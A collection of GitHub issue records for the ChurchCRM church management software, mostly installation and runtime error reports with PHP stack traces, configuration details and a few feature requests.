In Firefox, when I go to ChurchCRM (localhost that points to /var/www/churchcrm/ ) to complete the installation, I get the error message: Slim Application Error. A website error has occurred. Sorry for the temporary inconvenience. | Cannot Install ChurchCRM 5.0.2 - Getting Slim Application Error | https://api.github.com/repos/ChurchCRM/CRM/issues/6557/comments | 11 | 2023-10-25T19:17:19Z | 2023-10-29T05:39:56Z | https://github.com/ChurchCRM/CRM/issues/6557 | 1,962,067,172 | 6,557 |
[
"ChurchCRM",
"CRM"
] |
#### On what page in the application did you find this issue?
While starting the setup
#### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
Shared hosting Linux Centos 7
#### What browser (and version) are you running?
Firefox 115.3.1esr (64-bit)
#### What version of PHP is the server running?
8.1.2
#### What version of SQL Server are you running?
5.5.62
#### What version of ChurchCRM are you running?
5.0.1
Hello ,
I was in the process of manual installation of ChurchCRM 5.0.1 on Centos 7 Apache 2.2, MYSQL 5.5, PHP 8.1.2.
However, the script throws a following issue while doing so . On hitting setup URL i.e :
http://domain.com/churchcrm/setup the following error is thrown i.e :

So to debug further I checked in external.log following is thrown i.e :
```
[{{DATE}} America/New_York] PHP Deprecated: Return type of ChurchCRM\data\Country::jsonSerialize() should either be compatible with JsonSerializable::jsonSerialize(): mixed, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in {{PATH}}/{{TO}}/{{CHURCHCRM}}/ChurchCRM/data/Country.php on line 28
[{{DATE}} America/New_York] PHP Deprecated: Return type of Slim\Collection::offsetExists($key) should either be compatible with ArrayAccess::offsetExists(mixed $offset): bool, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in {{PATH}}/{{TO}}/{{CHURCHCRM}}/vendor/slim/slim/Slim/Collection.php on line 112
[{{DATE}} America/New_York] PHP Deprecated: Return type of Slim\Collection::offsetGet($key) should either be compatible with ArrayAccess::offsetGet(mixed $offset): mixed, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in {{PATH}}/{{TO}}/{{CHURCHCRM}}/vendor/slim/slim/Slim/Collection.php on line 124
[{{DATE}} America/New_York] PHP Deprecated: Return type of Slim\Collection::offsetSet($key, $value) should either be compatible with ArrayAccess::offsetSet(mixed $offset, mixed $value): void, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in {{PATH}}/{{TO}}/{{CHURCHCRM}}/vendor/slim/slim/Slim/Collection.php on line 135
[{{DATE}} America/New_York] PHP Deprecated: Return type of Slim\Collection::offsetUnset($key) should either be compatible with ArrayAccess::offsetUnset(mixed $offset): void, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in {{PATH}}/{{TO}}/{{CHURCHCRM}}/vendor/slim/slim/Slim/Collection.php on line 145
[{{DATE}} America/New_York] PHP Deprecated: Return type of Slim\Collection::count() should either be compatible with Countable::count(): int, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in {{PATH}}/{{TO}}/{{CHURCHCRM}}/vendor/slim/slim/Slim/Collection.php on line 155
[{{DATE}} America/New_York] PHP Deprecated: Return type of Slim\Collection::getIterator() should either be compatible with IteratorAggregate::getIterator(): Traversable, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in {{PATH}}/{{TO}}/{{CHURCHCRM}}/vendor/slim/slim/Slim/Collection.php on line 165
[{{DATE}} America/New_York] PHP Deprecated: Return type of Slim\Collection::offsetExists($key) should either be compatible with ArrayAccess::offsetExists(mixed $offset): bool, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in {{PATH}}/{{TO}}/{{CHURCHCRM}}/vendor/slim/slim/Slim/Collection.php on line 112
[{{DATE}} America/New_York] PHP Deprecated: Return type of Slim\Collection::offsetGet($key) should either be compatible with ArrayAccess::offsetGet(mixed $offset): mixed, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in {{PATH}}/{{TO}}/{{CHURCHCRM}}/vendor/slim/slim/Slim/Collection.php on line 124
[{{DATE}} America/New_York] PHP Deprecated: Return type of Slim\Collection::offsetSet($key, $value) should either be compatible with ArrayAccess::offsetSet(mixed $offset, mixed $value): void, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in {{PATH}}/{{TO}}/{{CHURCHCRM}}/vendor/slim/slim/Slim/Collection.php on line 135
[{{DATE}} America/New_York] PHP Deprecated: Return type of Slim\Collection::offsetUnset($key) should either be compatible with ArrayAccess::offsetUnset(mixed $offset): void, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in {{PATH}}/{{TO}}/{{CHURCHCRM}}/vendor/slim/slim/Slim/Collection.php on line 145
[{{DATE}} America/New_York] PHP Deprecated: Return type of Slim\Collection::count() should either be compatible with Countable::count(): int, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in {{PATH}}/{{TO}}/{{CHURCHCRM}}/vendor/slim/slim/Slim/Collection.php on line 155
[{{DATE}} America/New_York] PHP Deprecated: Return type of Slim\Collection::getIterator() should either be compatible with IteratorAggregate::getIterator(): Traversable, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in {{PATH}}/{{TO}}/{{CHURCHCRM}}/vendor/slim/slim/Slim/Collection.php on line 165
[{{DATE}} America/New_York] PHP Deprecated: preg_replace_callback(): Passing null to parameter #3 ($subject) of type array|string is deprecated in {{PATH}}/{{TO}}/{{CHURCHCRM}}/vendor/slim/slim/Slim/Http/Uri.php on line 717
[{{DATE}} America/New_York] PHP Warning: Undefined global variable $_SESSION in {{PATH}}/{{TO}}/{{CHURCHCRM}}/ChurchCRM/Authentication/AuthenticationManager.php on line 23
[{{DATE}} America/New_York] Slim Application Error:
Type: TypeError
Message: key_exists(): Argument #2 ($array) must be of type array, null given
File: {{PATH}}/{{TO}}/{{CHURCHCRM}}/ChurchCRM/Authentication/AuthenticationManager.php
Line: 23
Trace: #0 {{PATH}}/{{TO}}/{{CHURCHCRM}}/ChurchCRM/Authentication/AuthenticationManager.php(23): key_exists('AuthenticationP...', NULL)
#1 {{PATH}}/{{TO}}/{{CHURCHCRM}}/ChurchCRM/Authentication/AuthenticationManager.php(37): ChurchCRM\Authentication\AuthenticationManager::GetAuthenticationProvider()
#2 {{PATH}}/{{TO}}/{{CHURCHCRM}}/ChurchCRM/Bootstrapper.php(91): ChurchCRM\Authentication\AuthenticationManager::GetCurrentUser()
#3 {{PATH}}/{{TO}}/{{CHURCHCRM}}/Include/FooterNotLoggedIn.php(31): ChurchCRM\Bootstrapper::GetCurrentLocale()
#4 {{PATH}}/{{TO}}/{{CHURCHCRM}}/setup/templates/setup-error.php(31): require('{{PATH}}/{{TO}}/{{CHURCHCRM}}...')
#5 {{PATH}}/{{TO}}/{{CHURCHCRM}}/vendor/slim/php-view/src/PhpRenderer.php(215): include('{{PATH}}/{{TO}}/{{CHURCHCRM}}...')
#6 {{PATH}}/{{TO}}/{{CHURCHCRM}}/vendor/slim/php-view/src/PhpRenderer.php(183): Slim\Views\PhpRenderer->protectedIncludeScope('templates/setup...', Array)
#7 {{PATH}}/{{TO}}/{{CHURCHCRM}}/vendor/slim/php-view/src/PhpRenderer.php(152): Slim\Views\PhpRenderer->fetchTemplate('setup-error.php', Array)
#8 {{PATH}}/{{TO}}/{{CHURCHCRM}}/vendor/slim/php-view/src/PhpRenderer.php(49): Slim\Views\PhpRenderer->fetch('setup-error.php', Array, true)
#9 {{PATH}}/{{TO}}/{{CHURCHCRM}}/setup/routes/setup.php(14): Slim\Views\PhpRenderer->render(Object(Slim\Http\Response), 'setup-error.php', Array)
#10 [internal function]: Closure->{closure}(Object(Slim\Http\Request), Object(Slim\Http\Response), Array)
#11 {{PATH}}/{{TO}}/{{CHURCHCRM}}/vendor/slim/slim/Slim/Handlers/Strategies/RequestResponse.php(40): call_user_func(Object(Closure), Object(Slim\Http\Request), Object(Slim\Http\Response), Array)
#12 {{PATH}}/{{TO}}/{{CHURCHCRM}}/vendor/slim/slim/Slim/Route.php(281): Slim\Handlers\Strategies\RequestResponse->__invoke(Object(Closure), Object(Slim\Http\Request), Object(Slim\Http\Response), Array)
#13 {{PATH}}/{{TO}}/{{CHURCHCRM}}/vendor/slim/slim/Slim/MiddlewareAwareTrait.php(117): Slim\Route->__invoke(Object(Slim\Http\Request), Object(Slim\Http\Response))
#14 {{PATH}}/{{TO}}/{{CHURCHCRM}}/vendor/slim/slim/Slim/Route.php(268): Slim\Route->callMiddlewareStack(Object(Slim\Http\Request), Object(Slim\Http\Response))
#15 {{PATH}}/{{TO}}/{{CHURCHCRM}}/vendor/slim/slim/Slim/App.php(503): Slim\Route->run(Object(Slim\Http\Request), Object(Slim\Http\Response))
#16 {{PATH}}/{{TO}}/{{CHURCHCRM}}/vendor/slim/slim/Slim/MiddlewareAwareTrait.php(117): Slim\App->__invoke(Object(Slim\Http\Request), Object(Slim\Http\Response))
#17 {{PATH}}/{{TO}}/{{CHURCHCRM}}/vendor/slim/slim/Slim/App.php(392): Slim\App->callMiddlewareStack(Object(Slim\Http\Request), Object(Slim\Http\Response))
#18 {{PATH}}/{{TO}}/{{CHURCHCRM}}/vendor/slim/slim/Slim/App.php(297): Slim\App->process(Object(Slim\Http\Request), Object(Slim\Http\Response))
#19 {{PATH}}/{{TO}}/{{CHURCHCRM}}/setup/index.php(29): Slim\App->run()
#20 {main}
View in rendered output by enabling the "displayErrorDetails" setting.
```
So I checked on earlier thread that entering details manually in /Include/Config.php and then hitting setup URL mentioned here
https://github.com/ChurchCRM/CRM/issues/6072#issuecomment-1257431868
I get a blank page and I checked apache logs following is thrown :
```
[{{DATE}}] [error] [client {{IP}}] PHP Fatal error: Uncaught Propel\\Runtime\\Exception\\PropelException: Your configuration is outdated. Please rebuild it with the config:convert command. Visit https://github.com/propelorm/Propel2/wiki/Exception-Target:-Loading-the-database for information on how to fix this. in {{PATH}}/{{TO}}/{{CHURCHCRM}}/vendor/propel/propel/src/Propel/Runtime/ServiceContainer/StandardServiceContainer.php:256\nStack trace:\n#0 {{PATH}}/{{TO}}/{{CHURCHCRM}}/ChurchCRM/Bootstrapper.php(181): Propel\\Runtime\\ServiceContainer\\StandardServiceContainer->checkVersion('2.0.0-dev')\n#1 {{PATH}}/{{TO}}/{{CHURCHCRM}}/ChurchCRM/Bootstrapper.php(62): ChurchCRM\\Bootstrapper::initPropel()\n#2 {{PATH}}/{{TO}}/{{CHURCHCRM}}/Include/LoadConfigs.php(22): ChurchCRM\\Bootstrapper::init('{{HOST}}', '{{PORT}}', '{{DBUSER}}', '{{DBPASS}}...', '{{DB}}', '/{{RELATIVE_PATH}}...', false, Array)\n#3 {{PATH}}/{{TO}}/{{CHURCHCRM}}/Include/Config.php(63): require_once('/home/soft/publ...')\n#4 {{PATH}}/{{TO}}/{{CHURCHCRM}}/index.php(15): require_once('/{{PATH}}/{{TO}}/{{CHURCHCRM}}...')\n#5 {main}\n thrown in {{PATH}}/{{TO}}/{{CHURCHCRM}}/vendor/propel/propel/src/Propel/Runtime/ServiceContainer/StandardServiceContainer.php on line 256
```
Is there any way to resolve the issue ?. Could you please replicate ?.
Till earlier version i.e 4.5.4 this method used to work . This isn't working in version 5.0.1.
Kindly help.
Regards. | ChurchCRM 5.0.1 throws PHP Fatal error: Uncaught Propel\\Runtime\\Exception\\PropelException: Your configuration is outdated | https://api.github.com/repos/ChurchCRM/CRM/issues/6552/comments | 1 | 2023-10-23T08:39:03Z | 2023-10-25T15:42:26Z | https://github.com/ChurchCRM/CRM/issues/6552 | 1,956,648,032 | 6,552 |
[
"ChurchCRM",
"CRM"
] | Missing Turkish (tr) but has 100 percentage | Add Turkish (tr) locale | https://api.github.com/repos/ChurchCRM/CRM/issues/6548/comments | 0 | 2023-10-22T03:41:55Z | 2023-10-22T04:05:57Z | https://github.com/ChurchCRM/CRM/issues/6548 | 1,955,747,135 | 6,548 |
[
"ChurchCRM",
"CRM"
] | #### On what page in the application did you find this issue?
'Reports/DirectoryReport.php'
Generating a PDF "People Directory" from the People Dashboard, results in the following in the PHP application log and a blank screen for the user:
```
#0 {main}
thrown in /path/to/churchcrm/Reports/DirectoryReport.php on line 157
[22-Oct-2023 13:12:32 Australia/Sydney] PHP Fatal error:
Uncaught TypeError:
count(): Argument #1 ($value) must be of type Countable|array, bool given in
/path/to/churchcrm/Reports/DirectoryReport.php:157
Stack trace:
#0 {main}
thrown in /path/to/churchcrm/Reports/DirectoryReport.php on line 157
```
That particular block of code [looks like this](https://github.com/ChurchCRM/CRM/blob/6b146cfee276505c34f788c711ebf647a1a5adcb/src/Reports/DirectoryReport.php#L157):
```php
$mysqlinfo = mysqli_get_server_info($cnInfoCentral);
$mysqltmp = explode('.', $mysqlinfo);
$mysqlversion = $mysqltmp[0];
if (count($mysqltmp[1] > 1)) { // <---- LINE 157 ----
$mysqlsubversion = $mysqltmp[1];
} else {
$mysqlsubversion = 0;
}
```
#### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
Shared Hosting (Linux+Apache+MariaDB+PHP 8.2)
#### What browser (and version) are you running?
Any - this is generating a server-side error
#### What version of PHP is the server running?
8.2.11
#### What version of SQL Server are you running?
MariaDB 5.7.23-23
#### What version of ChurchCRM are you running?
5.0.0 | Blank page when generating People Directory on 5.0.0 | https://api.github.com/repos/ChurchCRM/CRM/issues/6547/comments | 6 | 2023-10-22T02:26:02Z | 2023-10-29T01:48:58Z | https://github.com/ChurchCRM/CRM/issues/6547 | 1,955,731,984 | 6,547 |
[
"ChurchCRM",
"CRM"
] | https://github.com/propelorm/Propel2 | Update Propel to latest Propel2 version | https://api.github.com/repos/ChurchCRM/CRM/issues/6541/comments | 0 | 2023-10-21T22:44:52Z | 2023-10-21T22:50:00Z | https://github.com/ChurchCRM/CRM/issues/6541 | 1,955,688,356 | 6,541 |
[
"ChurchCRM",
"CRM"
] | **If you have the ChurchCRM software running, please file an issue using the _Report an issue_ in the help menu.**
Hey Awesome People,
Please help I'm getting this error
This page isn’t workingc.spacelinkhosting.com redirected you too many times.
[Try clearing your cookies](https://support.google.com/chrome?p=rl_error&hl=en-GB).
ERR_TOO_MANY_REDIRECTS
#### On what page in the application did you find this issue?
the whole website
#### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
Shared hosting, linux
#### What browser (and version) are you running?
Chrome (Latest)
#### What version of PHP is the server running?
7.3
#### What version of SQL Server are you running?
Latest
#### What version of ChurchCRM are you running?
[ChurchCRM-4.5.4.zip](https://github.com/ChurchCRM/CRM/releases/download/4.5.4/ChurchCRM-4.5.4.zip)
| ERR_TOO_MANY_REDIRECTS | https://api.github.com/repos/ChurchCRM/CRM/issues/6531/comments | 4 | 2023-10-02T07:20:06Z | 2023-10-30T14:36:30Z | https://github.com/ChurchCRM/CRM/issues/6531 | 1,921,377,900 | 6,531 |
[
"ChurchCRM",
"CRM"
] | Downloaded the zip file and upload to my web server, created database and make sure PHP is the right one but when I visited the URL it redirects to /setup and nothing is happening just blank.
When I change the PHP version I get a message of incompatibility but changing to the right version, it's just blank.
I'll appreciate help to resolve this.
Thank you for the wonderful work you're doing. | Unable to Install | https://api.github.com/repos/ChurchCRM/CRM/issues/6528/comments | 10 | 2023-09-25T18:51:33Z | 2023-10-21T16:46:40Z | https://github.com/ChurchCRM/CRM/issues/6528 | 1,912,096,150 | 6,528 |
[
"ChurchCRM",
"CRM"
] | I did a fresh install of ChurchCRM (latest version) on my shared hosting plan. I am able to login to admin but when I attempt to make changes to anything, I get the following error:
```
412 Error
Your request got filtered out due to possible security issues.
One or more things in your request were suspicious (defective request header, invalid cookies, bad parameters)
If you think you did nothing wrong:
- try again with a different browser
- avoid any evil characters inside the request url
If you are the owner of the website, you can consider revising the rules of the mod_security module or turning it off from your Web Hosting Control Panel.
```
| 412 Error | https://api.github.com/repos/ChurchCRM/CRM/issues/6527/comments | 0 | 2023-09-25T02:34:10Z | 2023-09-25T02:37:01Z | https://github.com/ChurchCRM/CRM/issues/6527 | 1,910,544,950 | 6,527 |
[
"ChurchCRM",
"CRM"
] | am running the crm on my laptop using xammp | You are running an incompatible php version. ChurchCRM requires PHP 7.3.x or PHP 7.4.x PHP 8.x is not supported yet. | https://api.github.com/repos/ChurchCRM/CRM/issues/6524/comments | 3 | 2023-08-26T05:53:14Z | 2023-09-24T02:47:23Z | https://github.com/ChurchCRM/CRM/issues/6524 | 1,867,922,738 | 6,524 |
[
"ChurchCRM",
"CRM"
] | **If you have the ChurchCRM software running, please file an issue using the _Report an issue_ in the help menu.**
#### On what page in the application did you find this issue?
/DirectoryReports.php
#### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
Shared Linux
#### What browser (and version) are you running?
Firefox 116.0.1
#### What version of PHP is the server running?
7.4
#### What version of SQL Server are you running?
10.6.14-MariaDB
#### What version of ChurchCRM are you running?
4.5.4
Diacritics still messed up in Directory title but good in the body of the report:

| Bug: Diacritics are still a problem in SOME areas in 4.5.4 | https://api.github.com/repos/ChurchCRM/CRM/issues/6521/comments | 2 | 2023-08-07T12:43:50Z | 2023-11-24T23:52:46Z | https://github.com/ChurchCRM/CRM/issues/6521 | 1,839,378,199 | 6,521 |
[
"ChurchCRM",
"CRM"
] | Yes, do note that the CSV export will export the person's role in groups. I made a change where the email export will respect the group flags (active/include in export).
As for Mailchimp API, we have to move from API 2.0 to API 3.0 and then we will add more MailChimp stuff... we also want to add webhooks from MailChimp to the CRM... lots of work... but fun..
_Originally posted by @DawoudIO in https://github.com/ChurchCRM/CRM/issues/2297#issuecomment-294368945_
| Add category to CSV Mailchimp export | https://api.github.com/repos/ChurchCRM/CRM/issues/6520/comments | 7 | 2023-08-07T10:02:47Z | 2024-02-08T01:59:04Z | https://github.com/ChurchCRM/CRM/issues/6520 | 1,839,118,327 | 6,520 |
[
"ChurchCRM",
"CRM"
] | Hi Team,
I've found several SQL Injection and Stored XSS vulnerabilities on a few pages of the application. I've already reached out to you all at info@churchcrm.io and am waiting to hear back. Looking forward to working together to get these issues fixed. | Multiple XSS & SQLI Vulnerabilities | https://api.github.com/repos/ChurchCRM/CRM/issues/6519/comments | 0 | 2023-08-01T00:47:27Z | 2023-10-21T16:49:19Z | https://github.com/ChurchCRM/CRM/issues/6519 | 1,830,273,022 | 6,519 |
[
"ChurchCRM",
"CRM"
] | **If you have the ChurchCRM software running, please file an issue using the _Report an issue_ in the help menu.**
#### On what page in the application did you find this issue?
When Loading Home Page (DashBoard)
#### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
Windows
#### What browser (and version) are you running?
Chrome
#### What version of PHP is the server running?
PHP Version 7.3.16
#### What version of SQL Server are you running?
#### What version of ChurchCRM are you running?
ChurchCRM-4.5.4 | Error making API Call to: /churchcrm/api/deposits/dashboard | https://api.github.com/repos/ChurchCRM/CRM/issues/6518/comments | 5 | 2023-07-25T13:56:59Z | 2024-06-16T17:36:38Z | https://github.com/ChurchCRM/CRM/issues/6518 | 1,820,406,652 | 6,518 |
[
"ChurchCRM",
"CRM"
] | **If you have the ChurchCRM software running, please file an issue using the _Report an issue_ in the help menu.**
Error 500 wrong PHP version when pulling from the dockerhub created with a docker compose YAML
#### On what page in the application did you find this issue?
IP with port
#### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
Ubuntu server running docker
#### What browser (and version) are you running?
Brave Browser and FireFox 115.0.2 (64-bit)
#### What version of PHP is the server running?
PHP 7.1.15
#### What version of SQL Server are you running?
Running MariaDB:latest build
#### What version of ChurchCRM are you running?
[4.5.4](https://github.com/ChurchCRM/CRM/releases/tag/4.5.4)
Attaching Docker YAML
services:
churchcrmdb:
image: lscr.io/linuxserver/mariadb:latest
container_name: churchcrmdb
environment:
- PUID=1000
- PGID=1000
- TZ=America/Chicago
- MYSQL_ROOT_PASSWORD=changeme
- MYSQL_DATABASE=churchcrmdb
- MYSQL_USER=churchcrm
- MYSQL_PASSWORD=changeme
volumes:
- /Config/churchcrmdb/config:/config
networks:
- churchcrm
restart: unless-stopped
churchcrm:
image: churchcrm/crm
container_name: churchcrm
environment:
- PUID=1000
- PGID=1000
ports:
- 81:80
restart: unless-stopped
depends_on:
- churchcrmdb
networks:
- churchcrm
networks:
churchcrm: | Error 500 wrong PHP version | https://api.github.com/repos/ChurchCRM/CRM/issues/6516/comments | 4 | 2023-07-18T20:58:37Z | 2023-10-30T00:22:56Z | https://github.com/ChurchCRM/CRM/issues/6516 | 1,810,708,109 | 6,516 |
[
"ChurchCRM",
"CRM"
] | Churchcrm 4.5.4, Ubuntu 22.04
In the menu on the left it gives a number count beside "Deposit" I had experimented with - and deleted - 2 deposits. They are no longer in the database, but a "2" remains beside the word Deposit no matter what I do. I tried hunting down possible fields in the database but don't know enough to find where the menu is pulling data to show a total #. Just to reiterate - I have 0 deposits in the database because I deleted them but the menu still shows that I have 2. Also, when I click on edit deposit slip it just shows a blank browser window since there isn't anything in the database to actually edit :) | Deposit Number in Menu is wrong | https://api.github.com/repos/ChurchCRM/CRM/issues/6515/comments | 6 | 2023-07-16T22:45:14Z | 2024-03-04T02:13:04Z | https://github.com/ChurchCRM/CRM/issues/6515 | 1,806,744,107 | 6,515 |
[
"ChurchCRM",
"CRM"
] | **If you have the ChurchCRM software running, please file an issue using the _Report an issue_ in the help menu.**
-On what page in the application did you find this issue?
www.mydomain/churchcrm/
-On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
Shared Hosting / 2MHost
-What browser (and version) are you running?
Mozilla Firefox 114.0.2
-What version of PHP is the server running?
cpsrvd 11.110.0.7
Database client version: libmysql - mysqlnd 8.1.16
PHP extension: mysqli Documentation curl Documentation mbstring Documentation
PHP version: 8.1.16
-What version of SQL Server are you running?
Server: Localhost via UNIX socket
Server type: MySQL
Server connection: SSL is not being used Documentation
Server version: 5.7.42 - MySQL Community Server (GPL)
Protocol version: 10
User: cpses_padvuanp8w@localhost
Server charset: cp1252 West European (latin1)
-What version of ChurchCRM are you running?
ChurchCRM-5.0.0-beta2
-Log File error:
[10-Jul-2023 01:06:43 UTC] PHP Fatal error: Composer detected issues in your platform: Your Composer dependencies require a PHP version ">= 8.1.0". You are running 8.0.29. in /home/papelarte/public_html/churchcrm/vendor/composer/platform_check.php on line 24
-WebPage error message:
Composer detected issues in your platform: Your Composer dependencies require a PHP version ">= 8.1.0".
| Composer Detected issues in your Plattform | https://api.github.com/repos/ChurchCRM/CRM/issues/6511/comments | 1 | 2023-07-10T01:22:53Z | 2023-07-17T01:15:20Z | https://github.com/ChurchCRM/CRM/issues/6511 | 1,795,711,102 | 6,511 |
[
"ChurchCRM",
"CRM"
] | **If you have the ChurchCRM software running, please file an issue using the _Report an issue_ in the help menu.**
#### On what page in the application did you find this issue?
**@install page**
#### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
**Windows**
#### What browser (and version) are you running?
**Chrome browser**
#### What version of PHP is the server running?
**8.2.4**
#### What version of SQL Server are you running?
**XAMPP v3.3.0**
#### What version of ChurchCRM are you running?
**5.0.0-beta-2**
#### Error Logs, when I run; **php -S 127.0.0.1:PORT**
Deprecated: Return type of Propel\Runtime\ActiveQuery\BaseModelCriteria::getIterator() should either be compatible with IteratorAggregate::getIterator(): Traversable, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in C:\xampp_8.2.4\htdocs\projects\ChurchCRM-5.0.0-beta2\churchcrm\vendor\propel\propel\src\Propel\Runtime\ActiveQuery\BaseModelCriteria.php on line 261
Deprecated: Return type of ChurchCRM\data\Country::jsonSerialize() should either be compatible with JsonSerializable::jsonSerialize(): mixed, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in C:\xampp_8.2.4\htdocs\projects\ChurchCRM-5.0.0-beta2\churchcrm\ChurchCRM\data\Country.php on line 28
Deprecated: Use of "self" in callables is deprecated in C:\xampp_8.2.4\htdocs\projects\ChurchCRM-5.0.0-beta2\churchcrm\ChurchCRM\data\Countries.php on line 276
Deprecated: Use of "self" in callables is deprecated in C:\xampp_8.2.4\htdocs\projects\ChurchCRM-5.0.0-beta2\churchcrm\ChurchCRM\data\Countries.php on line 276
Deprecated: Return type of Slim\Collection::offsetExists($key) should either be compatible with ArrayAccess::offsetExists(mixed $offset): bool, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in C:\xampp_8.2.4\htdocs\projects\ChurchCRM-5.0.0-beta2\churchcrm\vendor\slim\slim\Slim\Collection.php on line 112
Deprecated: Return type of Slim\Collection::offsetGet($key) should either be compatible with ArrayAccess::offsetGet(mixed $offset): mixed, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in C:\xampp_8.2.4\htdocs\projects\ChurchCRM-5.0.0-beta2\churchcrm\vendor\slim\slim\Slim\Collection.php on line 124
Deprecated: Return type of Slim\Collection::offsetSet($key, $value) should either be compatible with ArrayAccess::offsetSet(mixed $offset, mixed $value): void, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in C:\xampp_8.2.4\htdocs\projects\ChurchCRM-5.0.0-beta2\churchcrm\vendor\slim\slim\Slim\Collection.php on line 135
Deprecated: Return type of Slim\Collection::offsetUnset($key) should either be compatible with ArrayAccess::offsetUnset(mixed $offset): void, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in C:\xampp_8.2.4\htdocs\projects\ChurchCRM-5.0.0-beta2\churchcrm\vendor\slim\slim\Slim\Collection.php on line 145
Deprecated: Return type of Slim\Collection::count() should either be compatible with Countable::count(): int, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in C:\xampp_8.2.4\htdocs\projects\ChurchCRM-5.0.0-beta2\churchcrm\vendor\slim\slim\Slim\Collection.php on line 155
Deprecated: Return type of Slim\Collection::getIterator() should either be compatible with IteratorAggregate::getIterator(): Traversable, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in C:\xampp_8.2.4\htdocs\projects\ChurchCRM-5.0.0-beta2\churchcrm\vendor\slim\slim\Slim\Collection.php on line 165
Deprecated: Return type of Slim\Collection::offsetExists($key) should either be compatible with ArrayAccess::offsetExists(mixed $offset): bool, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in C:\xampp_8.2.4\htdocs\projects\ChurchCRM-5.0.0-beta2\churchcrm\vendor\slim\slim\Slim\Collection.php on line 112
Deprecated: Return type of Slim\Collection::offsetGet($key) should either be compatible with ArrayAccess::offsetGet(mixed $offset): mixed, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in C:\xampp_8.2.4\htdocs\projects\ChurchCRM-5.0.0-beta2\churchcrm\vendor\slim\slim\Slim\Collection.php on line 124
Deprecated: Return type of Slim\Collection::offsetSet($key, $value) should either be compatible with ArrayAccess::offsetSet(mixed $offset, mixed $value): void, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in C:\xampp_8.2.4\htdocs\projects\ChurchCRM-5.0.0-beta2\churchcrm\vendor\slim\slim\Slim\Collection.php on line 135
Deprecated: Return type of Slim\Collection::offsetUnset($key) should either be compatible with ArrayAccess::offsetUnset(mixed $offset): void, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in C:\xampp_8.2.4\htdocs\projects\ChurchCRM-5.0.0-beta2\churchcrm\vendor\slim\slim\Slim\Collection.php on line 145
Deprecated: Return type of Slim\Collection::count() should either be compatible with Countable::count(): int, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in C:\xampp_8.2.4\htdocs\projects\ChurchCRM-5.0.0-beta2\churchcrm\vendor\slim\slim\Slim\Collection.php on line 155
Deprecated: Return type of Slim\Collection::getIterator() should either be compatible with IteratorAggregate::getIterator(): Traversable, or the #[\ReturnTypeWillChange] attribute should be used to temporarily suppress the notice in C:\xampp_8.2.4\htdocs\projects\ChurchCRM-5.0.0-beta2\churchcrm\vendor\slim\slim\Slim\Collection.php on line 165
Fatal error: Uncaught RuntimeException: Unexpected data in output buffer. Maybe you have characters before an opening <?php tag? in C:\xampp_8.2.4\htdocs\projects\ChurchCRM-5.0.0-beta2\churchcrm\vendor\slim\slim\Slim\App.php:621 Stack trace: #0 C:\xampp_8.2.4\htdocs\projects\ChurchCRM-5.0.0-beta2\churchcrm\vendor\slim\slim\Slim\App.php(317): Slim\App->finalize(Object(Slim\Http\Response)) #1 C:\xampp_8.2.4\htdocs\projects\ChurchCRM-5.0.0-beta2\churchcrm\setup\index.php(29): Slim\App->run() #2 {main} thrown in C:\xampp_8.2.4\htdocs\projects\ChurchCRM-5.0.0-beta2\churchcrm\vendor\slim\slim\Slim\App.php on line 621
| Installation issues. Deprecated functions | https://api.github.com/repos/ChurchCRM/CRM/issues/6501/comments | 4 | 2023-06-09T16:45:20Z | 2023-10-21T22:30:07Z | https://github.com/ChurchCRM/CRM/issues/6501 | 1,750,203,062 | 6,501 |
[
"ChurchCRM",
"CRM"
] | **If you have the ChurchCRM software running, please file an issue using the _Report an issue_ in the help menu.**
npm run deploy
```
npm ERR! code 1
npm ERR! path /home/ChurchCRM/node_modules/node-sass
npm ERR! command failed
npm ERR! command sh -c node scripts/build.js
npm ERR! Building: /root/.nvm/versions/node/v18.16.0/bin/node /home/ChurchCRM/node_modules/node-gyp/bin/node-gyp.js rebuild --verbose --libsass_ext= --libsass_cflags= --libsass_ldflags= --libsass_library=
npm ERR! gyp info it worked if it ends with ok
npm ERR! gyp verb cli [
npm ERR! gyp verb cli '/root/.nvm/versions/node/v18.16.0/bin/node',
npm ERR! gyp verb cli '/home/ChurchCRM/node_modules/node-gyp/bin/node-gyp.js',
npm ERR! gyp verb cli 'rebuild',
npm ERR! gyp verb cli '--verbose',
npm ERR! gyp verb cli '--libsass_ext=',
npm ERR! gyp verb cli '--libsass_cflags=',
npm ERR! gyp verb cli '--libsass_ldflags=',
npm ERR! gyp verb cli '--libsass_library='
npm ERR! gyp verb cli ]
